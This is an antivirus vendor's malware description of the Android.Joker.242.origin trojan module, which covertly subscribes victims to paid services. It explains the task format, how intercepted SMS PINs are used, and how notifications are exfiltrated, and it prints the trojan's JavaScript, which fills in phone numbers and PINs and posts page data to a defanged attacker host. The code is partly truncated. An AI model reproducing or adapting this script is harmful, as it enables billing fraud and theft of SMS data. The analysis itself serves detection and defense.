My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets



Added to the Dr.Web virus database: 2021-01-27

Virus description added:


A malicious software from the Android.Joker family. It represents a module that is downloaded by some other modifications of this family. It performs hidden payments from mobile phone accounts and subscribes victims to paid services. Service activation is performed without any action from the user. To do so, Android.Joker.242.origin covertly loads premium services websites where it imitates the actions of Android device users, automatically clicking on the required menu buttons and entering confirmation codes.

Information about known modifications of the Android.Joker using this module is available in the link to the indicators of compromise at the end of this description.

Operating routine

Android.Joker.242.origin is downloaded and launched through the DexClassLoader class during the operation of the base trojan module. Upon launching, it requests the list of tasks appOfferList located at hxxps://ad[.]mobnv[.]com/prod-api/foreign/app/channel/appOffer/getTask.

Upon request, the following parameters are sent to the server:

  • AppNumber—application ID (set by another module, appid by default)
  • AppVersion—application version
  • OperatorCode—SIM card mobile provider code

Each task consists of the following fields:

  • appCampSuccessKey―contains a string. When the premium service web page is loaded, its URL is checked to contain the specified string; if the string is there, the payment is considered to be successfully completed.
  • appCampHeader―header X-Requested-With, loaded with the task URL.
  • offerId―task ID.
  • js―a JavaScript executed after the targeted web page is loaded in WebView. It is encoded with Base64, and also executed upon receiving the notification with the subscription confirmation PIN code, which is executed after the landing page has loaded in WebView.
  • appCampTrackUrl―the initial task URL.
  • offShortcode―a string whose presence is checked in the title of a read notification with the payment confirmation PIN code.
  • appCampPinRegex―a regular expression for searching for the payment confirmation PIN code in the text of the notification.
  • appCampLoadWay―a method of loading a task URL into WebView. There are two ways for this in the analyzed sample:
    1. directly loading the page into WebView
    2. following the link using a GET request, then following the link from the Location field or refresh header of the response and so on, until it becomes a link without these headers. This link will be loaded into WebView.
  • offerName―task name.

In addition to the task list, the server response contains the list of strings errorPool. URLs of targeted websites loaded into WebView are verified to contain these strings. If any of them are present in the web address, the task execution is stopped and the trojan proceeds to the next one.

Payment processing

In order for the payment to be successful, the infected device must be connected to the mobile internet. If the connection is different, Android.Joker.242.origin attempts to turn off the active Wi-Fi connection, using However, the trojan can only do this on devises running Android OS versions below 10.

Next, for each task, the NovaSdkView component containing android.webkit.WebView (a WebView object) is created sequentially with short time intervals. An assigned URL is then loaded into this WebView, using one of the methods given above (appCampLoadWay parameter).

Once the web page is loaded, the JavaScript received from the server is then loaded. In this code, the @@@@ string is replaced by a victim’s phone number prior to the loading. With that, the number itself is read from SharedPreferences where it must be saved by the base trojan module.

The base trojan module intercepts notifications about incoming SMS and sends the intent with the action="SEND_APP_NOTIFICATION_ACTION" field. This intent contains the notification’s title and text. In turn, Android.Joker.242.origin receives the intent through the broadcast receiver and, using the regular expression, searches for the PIN code in the notification’s text. The successfully obtained PIN is then added into the JavaScript instead of ####, and the script is then executed. With that, the Android.Joker.242.origin module not only searches for the confirmation codes, but also logs all received notifications about SMS and sends this information to hxxps://ad[.]mobnv[.]com, which can lead to a confidential data leak.

The URLs of the targeted websites loaded into WebView are checked to contain the appCampSuccessKey string. . Its presence is interpreted as a successful payment, while the presence of the strings from the errorPool list is interpreted as an error. In both cases, Android.Joker.242.origin proceeds to execute the next task.

The tasks from the list for processing payments are executed one after another. With that, there is a designed limitation subscribeLimit for the number of successfully completed payments for a single user. This limitation is read from SharedPreferences where it’s recorded by another module. By default, it is 5 payments, but it can be changed up or down.

Task example:

         "offerName":"SA-Insaudi 1-All-PIN-4261-mobily"

An example of JavaScript executed by the trojan:

function doAjax(data) {
    var xhr = null;
    if (window.XMLHttpRequest) {
        xhr = new XMLHttpRequest()
    } else {
        xhr = new ActiveXObject("Microsoft.XMLHTTP")
    var type = data.type == "get" ? "get" : "post";
    var async = data.type ? true : false;, data.url, async);
    if (type === "post") {
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded")
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4) {
            if (xhr.status == 200) {
                if (typeof data.success == "function") {
                } else {
                    if (typeof data.error == "function") {
function uploadSource(value) {
    var time = (new Date()).getTime();
    var pageurl = encodeURIComponent(window.location.href);
    var source = "";
    if (null == value || '' == value || 'undefined' == value) {
        source = encodeURIComponent(document.documentElement.outerHTML);
    } else {
        source = value;
    var offerId = 1992;
    var appId = 131;
    var url = "hxxp://www[.]mobnv[.]com/pay/api/userlog/wapsource/";
    var params = "time=" + time + "&url=" + pageurl + "&source=" + source + "&offerid=" + offerId + "&appId=" + appId;
    var data = {
        type: "post",
        url: url,
        data: params,
        async: true,
        success: "alert",
        error: null
if (window.location.href.indexOf("hxxps://cmpgn1[.]sportmob[.]com/landing/bg-ksa-p-vertads25?clickid=") !== -1) {
    var mninput = document.getElementById("number_input");
    var pininput = document.getElementById("code_input");
    var ok = document.getElementsByClassName("form number_confirmation")[0].className;
    if (ok.indexOf("show") == -1) {
        var g = document.getElementsByTagName("label");
        for (var e = 0; e < g.length; e++) {
        var phonenumber = "@@@@";
        if (phonenumber !== "" && phonenumber.indexOf("@") === -1) {
            phonenumber = phonenumber.replace("+", "");
            if (phonenumber > 9) {
                phonenumber = phonenumber.substring(phonenumber.length - 9, phonenumber.length);
            mninput.value = "966" + phonenumber;
            setTimeout(function() {
                uploadSource(mninput.value + "||" + encodeURIComponent(document.documentElement.outerHTML));
            }, 500);
    } else {
        var pinvalue = "####";
        if (pinvalue !== "" && pinvalue.indexOf("#") === -1) {
            pininput.value = pinvalue;
            setTimeout(function() {
                uploadSource(pininput.value + "||" + encodeURIComponent(document.documentElement.outerHTML));
            }, 500);

Indicators of compromise

News about the trojan

Curing recommendations


  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web для Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android